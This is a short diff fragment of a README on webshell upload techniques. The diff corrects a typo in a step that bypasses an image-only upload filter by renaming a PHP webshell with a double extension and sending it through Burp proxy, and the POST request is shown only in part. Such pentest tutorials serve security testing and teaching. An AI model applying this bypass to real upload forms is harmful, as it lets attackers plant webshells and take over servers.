Jean-Francois-C/Webshell-upload-techniques/README.md

           You tried to upload a php webshell named "Webshell.php" but it is rejected (only .png, .gif and .jpg files are accepted)

 ➤ Step 2.
 Simply modify the file extension of your webshell like "Webshell.php.png" to 'bypass' the file format check based on the file extension
-          - Using Burp proxy send the following POST HHTP request:
+          - Using Burp proxy send the following POST HTTP request:
             POST /application/image_upload.php HTTP/1.1
             Host: x.x.x.x
             User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0